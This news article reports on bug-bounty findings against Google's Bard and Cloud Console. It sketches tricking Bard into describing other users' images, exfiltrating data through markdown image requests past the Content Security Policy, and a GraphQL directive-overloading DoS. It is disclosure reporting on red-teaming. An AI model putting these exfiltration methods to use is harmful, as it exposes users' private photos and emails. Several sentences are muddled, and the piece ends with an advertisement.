Researchers Hacked Google AI: Earned $50,000 Bounty

Researchers who found and reported vulnerabilities in Google's Bard AI at the company's LLM bugSWAT event in Las Vegas were awarded a $50,000 bounty. Together, Roni Carta, Justin Gardner, and Joseph Thacker exploited Google Cloud Console and Bard.

The researchers discovered security holes that might have made it possible for DoS attacks, the exfiltration of user data, and access to submit photos that are specifically associated with a particular user.

Any uploaded image can be processed and described by the vision function. But we noticed a significant issue. Roni Carta posted on his blog, "We were able to access another user's photographs without any permissions or verification process when we used this issue.

Hack on Bard

The researcher claimed that an attacker may successfully gain unauthorized visual access to any image uploaded by the target by tricking Bard into describing a picture shared by a different user.

 

Furthermore, given Bard's proficiency with optical character recognition (OCR), this may also lead to the unintentional release of private textual data from the victim's photos, including notes, emails, and income.

The Researcher’s Idea was Simple

What if we get Bard to encapsulate our emails, files on disk, and other data, which we could then extract using markdown? The researcher considered infiltrating through photos.

 

The purpose of a Content Security Policy (CSP) is to protect against data injection and Cross-Site Scripting (XSS) attacks by letting the backend server specify which sites are acceptable for a browser to accept as sources of executable scripts, images, styles, and other files.

All things considered, anything that triggers an HTTP request from an origin. Researchers successfully obtained their victims’ email accounts. Justin and Roni were rewarded with a $20,000 bounty and an extra $1,337 for the third-coolest bug of the event after promptly informing Google about this vulnerability!

Exploiting the Google Cloud Console

In addition, researchers might target newly available AI features on the Google Cloud Console within the event's architecture.

Roni Carta immediately started his proxy and inspected every interaction between the front and back end. One of the API endpoints was cloud console-pa.clients6.google.com/graphQL, which was up and running.

Upon learning that they were using GraphQL, researchers immediately looked for a Denial of Service (DoS). When a query is purposefully written with an excessive number of directives, it is known as directive overloading.

This can be done to raise the computing load by taking advantage of the way the server processes each command. When researchers introduced more directives, the backend would respond to requests more slowly, when exploiting Denial-of-Service (DoS) events that may impact the target's accessibility.

 

“A malicious actor could easily compute a request with millions of directives and send thousands of requests per minute to hang some part of Google’s Backend,” stated the researchers. The Bug Bounty Team gave researchers $1,000, with an additional $5,000 for the “Coolest Bug of the Event” reward.

Google's Bug Bounty team hosted the event because they aim to develop an efficient Security Red Teaming approach. After all, AIs are employed in their products. They challenged scientists all across the world to explore vulnerabilities that they had not yet found.

You can prevent malware like Trojan horses, ransomware, spyware, rootkits, worms, and zero-day exploits by using Perimeter81 malware protection. They're all extremely dangerous and capable of causing chaos and destruction to your network.